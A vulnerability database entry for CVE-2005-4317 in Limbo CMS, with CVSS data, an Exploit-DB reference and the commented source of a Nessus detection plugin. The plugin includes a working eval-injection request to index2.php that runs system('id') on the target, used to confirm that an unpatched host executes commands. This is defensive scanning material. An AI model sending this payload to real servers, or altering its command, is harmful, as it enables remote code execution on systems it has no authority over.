Vulnerabilities > CVE-2005-4317 - Unspecified vulnerability in Limbo CMS Limbo CMS

CVSS 6.8 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
limbo-cms
nessus
exploit available

Summary

Limbo CMS 1.0.4.2 and earlier, with register_globals off, does not protect the $_SERVER variable from external modification, which allows remote attackers to use the _SERVER[REMOTE_ADDR] parameter to (1) conduct cross-site scripting (XSS) attacks in the stats module or (2) execute arbitrary code via an eval injection attack in the wrapper option in index2.php.

Vulnerable Configurations

Part Description Count
Application
Limbo_Cms
1

Exploit-Db

descriptionLimbo CMS 1.0.4.2 index.php _SERVER[REMOTE_ADDR] Parameter XSS. CVE-2005-4317. Webapps exploit for php platform
idEDB-ID:26836
last seen2016-02-03
modified2005-12-14
published2005-12-14
reporterrgod
sourcehttps://www.exploit-db.com/download/26836/
titleLimbo CMS 1.0.4.2 - index.php _SERVER[REMOTE_ADDR] Parameter XSS

Nessus

NASL familyCGI abuses
NASL idLIMBO_MULTIPLE_FLAWS.NASL
descriptionThe remote host is running Limbo CMS, a content-management system written in PHP. The remote version of this software is vulnerable to several flaws including : - If register_globals is off and Limbo is configured to use a MySQL backend, then a SQL injection is possible due to improper sanitization of the
last seen2020-06-01
modified2020-06-02
plugin id20824
published2006-01-30
reporterThis script is Copyright (C) 2006-2018 Josh Zlatin-Amishav
sourcehttps://www.tenable.com/plugins/nessus/20824
titleLimbo CMS Multiple Vulnerabilities
code
#
# This script was written by Josh Zlatin-Amishav <josh at ramat dot cc>
# GPLv2
#

include("compat.inc");

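if(description)
{
 # Registration branch: only plugin metadata is declared here. The engine
 # sets 'description' when it enumerates plugins, so the network check in
 # the main body below never runs from this block.
 script_id(20824);
 script_version ("1.14");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

 # One plugin covers four related Limbo CMS advisories; the single check
 # below triggers the eval-injection path, and the other findings (XSS,
 # SQL injection, path disclosure) are reported alongside it.
 script_cve_id("CVE-2005-4317", "CVE-2005-4318", "CVE-2005-4319", "CVE-2005-4320");
 script_bugtraq_id(15871);
 
 script_name(english:"Limbo CMS Multiple Vulnerabilities");
 script_summary(english:"Checks for multiple vulnerabilities in Limbo");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
numerous vulnerabilities." );
 # Fixed spelling in the user-facing description: 'reqeusted' -> 'requested',
 # 'sanitation' -> 'sanitization', 'transversal' -> 'traversal'.
 script_set_attribute(attribute:"description", value:
"The remote host is running Limbo CMS, a content-management system
written in PHP. 

The remote version of this software is vulnerable to several flaws
including :

  - If register_globals is off and Limbo is configured to use 
    a MySQL backend, then a SQL injection is possible due to 
    improper sanitization of the '_SERVER[REMOTE_ADDR]' 
    parameter.

  - The installation path is revealed when the 'doc.inc.php', 
    'element.inc.php', and 'node.inc.php' files are requested 
    when PHP's 'display_errors' setting is enabled.

  - A cross-site scripting attack is possible when the Stats 
    module is used due to improper sanitization of the 
    '_SERVER[REMOTE_ADDR]' parameter.

  - Arbitrary PHP files can be retrieved via the 
    'index2.php' script due to improper sanitization of the 
    'option' parameter.

  - An attacker can run arbitrary system commands on the 
    remote system via a combination of the SQL injection 
    and directory traversal attacks." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/419470" );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6b3b5f19" );
 script_set_attribute(attribute:"solution", value:
"Apply the patch from the references above." );
 # Plugin-wide CVSS2 base vector (AC:L). It is not the per-CVE rating of
 # CVE-2005-4317 alone, which is listed with AC:M -- presumably the vector
 # reflects the highest-rated of the four CVEs this plugin covers.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/12/14");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 # Must come after the last script_set_attribute() call.
 script_end_attributes();

 # ACT_ATTACK: the check sends a request that makes the target execute a
 # command, so the scanner schedules it as an active test rather than a
 # passive version check.
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2006-2020 Josh Zlatin-Amishav");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}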

# The script code starts here

include("http_func.inc");
include("http_keepalive.inc");

# Main body: pick the web port and bail out early when there is nothing
# to test (port closed, or the server cannot serve PHP at all).
www_port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(www_port))
{
  exit(0);
}
if (!can_host_php(www_port))
{
  exit(0);
}

# The probe exercises the eval-injection flaw described in the plugin
# metadata: with register_globals off, Limbo lets the '_SERVER[REMOTE_ADDR]'
# query parameter overwrite the PHP superglobal, and the 'wrapper' option of
# index2.php evaluates that value. If the response contains id(1)-style
# 'uid=... gid=...' output, the target ran the command and is unpatched.
probe = "/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1";
expected = "uid=[0-9]+.*gid=[0-9]+.*";

# The xss/sql_inject flags are passed through to the shared helper; they
# appear to mark the finding as also covering the XSS and SQL-injection
# advisories this plugin reports -- confirm against http_func.inc.
http_check_remote_code_ka(
  extra_dirs:"",
  check_request:probe,
  check_result:expected,
  command:"id",
  port:www_port,
  xss: 1, sql_inject: 1
);